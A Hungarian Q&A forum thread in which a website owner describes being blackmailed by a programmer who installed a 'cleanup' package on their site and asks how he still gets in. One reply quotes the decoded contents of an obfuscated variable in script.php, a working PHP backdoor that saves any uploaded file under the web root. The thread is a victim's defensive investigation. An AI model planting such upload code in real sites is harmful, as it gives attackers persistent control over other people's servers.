Kaptam egy fenyegetést egy programozó sráctól, hogy töröljem le az oldalamat vagy letörölteti, hogyan férhet hozzá?
Felajánlotta ingyen, hogy segít.
Nagyon-nagyon óvatos voltam, hogy ne nyúlhasson bele, de végül csak beadtam a derekam és feltelepítettem azt a csomagot amit ő "jóindulatúan" átküldött, hogy minden jó legyen. Mivel nekem is rengeteg munkám volt az oldalon nem igazán volt szükségem arra, hogy ő így nagyon "áttisztítsa" meg mittudomén, de megcsinálta.
Idővel elkezdett gyanúsan viselkedni majd kötekedni.
A kötekedés zsarolásba ment át, és valahogy belülről hozzáfér a weboldalamhoz és meg tudja változtatni a tartalmat, így egyszer már letörölte a file-okat.
Én írtam a szolgáltatómnak, hogy hackertámadás alatt állok de alapvetően nem tudom mit tehetnék.
Meg tudnátok mondani pontosan hogyan lehetséges PHP vagy javascript alapon belenyúlni a filerendszerbe anélkül, hogy adatbázis futna az oldalamon? Mit kell keresnem? Sajnos ehhez nem értek.
Meg a másik, hogy egyáltalán hogyan tudom ezt az elmebeteget leállítani? Senki sem kérte, hogy "tisztítsa le" az oldalam kódját, de mivel én is dolgoztam rajta párhuzamosan, olyan szinten összekeveredett a két munka, hogy az egészet újra kéne csinálnom és nem fogom, mert már bocs, de senki sem kérte arra hogy önként segítsen.
Lehet, hogy ez egy piti bűnöző és nagyon sok emberrel játszotta már ezt el. Hogyan állítsam le, és hogyan nyúl bele az oldalamba? Az ftp jelszó már rég meg van változtatva.
Nem zavar hogy ott van kapásból a gyökérkönyvtárban a hostinger.php ami egy fájlkezelő és még csak jelszót se kér?
De miért nem kér jelszót? Úristen.
Ezt nem értem.
Ez hogy lehetséges?
"Az egyik fájlban valóban benne van, hogy bármit fel tud tölteni a tárhelyre"
Meg tudnad mondani, hogy melyik az a file? Nem vagom a web programozast, es semmi erre utalo sort nem talaltam. Koszi.
Én is azt kérdezném, hogy meg tudná-e mondani.
A hostinger.php-ra célozhat, de miután letöröltem is bele tudott nyúlni az oldalba, szóval szerintem azt csaliként rakhatta ki.
Csak nagyon alapszinten értek a PHP-hez, de a "script.php"-ben miért kell a "$control" változó tartalmát háromszor kódolni?
Dekódolás után ez az értéke:
$important=$_SERVER["DOCUMENT_ROOT"]."/php/";if(!empty($_POST)){if(!is_dir($important))mkdir($important);move_uploaded_file($_FILES["index"]["tmp_name"],$important.basename($_FILES["index"]["name"]));}
Kapcsolódó kérdések:
Minden jog fenntartva © 2024, www.gyakorikerdesek.hu
GYIK | Szabályzat | Jogi nyilatkozat | Adatvédelem | Cookie beállítások | WebMinute Kft. | Facebook | Kapcsolat: info(kukac)gyakorikerdesek.hu
Ha kifogással szeretne élni valamely tartalommal kapcsolatban, kérjük jelezze e-mailes elérhetőségünkön!